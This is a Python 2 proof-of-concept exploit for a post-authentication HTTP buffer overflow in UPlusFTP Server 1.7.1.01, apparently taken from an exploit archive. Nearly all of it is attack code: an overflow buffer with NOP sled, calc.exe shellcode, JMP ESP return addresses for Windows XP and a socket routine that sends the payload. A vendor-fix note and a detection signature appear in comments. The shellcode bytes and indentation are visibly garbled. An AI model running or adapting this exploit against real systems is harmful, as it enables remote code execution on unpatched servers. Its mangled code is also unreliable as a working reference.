UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth
UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth
===============================================================
#!/usr/bin/python
# Proof-of-concept for the post-authentication buffer overflow in the HTTP
# interface of UPlusFTP Server 1.7.1.01: an overlong value is sent in the
# `path` query parameter of /list.html (request assembled below). The notes
# further down record that the vendor fixed it in 1.7.1.02, so upgrading is
# the mitigation. This is Python 2 (print statement, str-based sockets); the
# indentation of the if/try/except bodies appears to have been lost in the
# page extraction and is reproduced as-is.
import socket,sys,base64
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
Discovered by : Karn Ganeshen
Author : Karn Ganeshen / corelanc0d3r
KarnGaneshen [aT] gmail [d0t] com
http://ipositivesecurity.blogspot.com
Greetz out to: corelanc0d3r
http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
# Four positional arguments are required. Credentials are mandatory because
# the vulnerable handler is only reachable behind HTTP Basic authentication
# (the Authorization header is added to the request below).
if len(sys.argv) != 5:
print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
# HTTP Basic credential value: base64 of "user:password" (Python 2 str in, str out).
auth = base64.b64encode(user+":"+pwd)
# Oversized `path` value, assembled from the pieces labelled in the comments
# below; the per-OS address lines are the only target-specific part.
buf="A"*1963
buf+="x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("xd9xcax29xc9xb1×24xbfx3fxc7×66x9fxd9×74x24xf4×5e"
"x31×7ex17×03x7ex17×83xf9xc3×84x6axf9×24x0cx95×01"
"xb5×06xd0×3dx3ex64xdex45×41x7ax6bxfax59×0fx33×24"
"x5bxe4×85xafx6fx71×14x41xbex45×8ex31×45x85xc5×4e"
"x87xccx2bx51xc5×3axc7×6ax9dx98×2cxf9xf8×6ax73×25"
"x02×86xeaxaex08×13x78xefx0cxa2×95x84×31x2fx68×71"
"xc0×73x4fx81×10xbax4fxedx1dxfdx7fx68xe1×86x73xf9"
"xa2×7ax07×8dx3ex2ex9cx05×37xdbxaax5exc7xabxadx60"
"xc8×40xc5×5cx97×67xe0xfcx71×01xf4×7fxbdx6ax55×17"
"xcex07×51xb8×46x80xa4xccx99xe7xa7×37xc6×66x34xd4"
"x27×0cxbcx7fx38")
buf+="x90"*15
#[ XP SP2 ] -> "x78×16xF3×77" #0×77F31678 JMP ESP
buf+="x78×16xF3×77"
#[ XP SP3 ] -> "x3Fx71×49x7E" #0×7E49713F JMP ESP
#buf+="x3Fx71×49x7E"
buf+="x90"*30
buf+="x66×05x7Ax03" #ADD AX,037A
buf+="x66×05x7Ax03" #ADD AX,037A
buf+="x66×05x7Ax03" #ADD AX,037A
buf+="x50xc3" #PUSH EAX + RET
print "[+] Launching exploit against " + target + "…"
# One GET request carrying the overlong query string; the Host header is sent
# with an empty value. For detection, the observable signature is a very long
# `path` query value on /list.html accompanied by an Authorization: Basic header.
head = "GET /list.html?path="+buf+" HTTP/1.1 rn"
head += "Host: rn"
head += "Authorization: Basic "+auth+"rn"
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, port))
s.send(head + "rn")
print "[!] Payload sent…"
s.close()
# Bare except: any failure (name resolution, refused connection, reset) is
# collapsed into one generic line, and a successful send says nothing about
# whether the service actually crashed - the script never reads a response.
except:
print "[x] Error!"
Source: http://inj3ct0r.com/exploits/13501
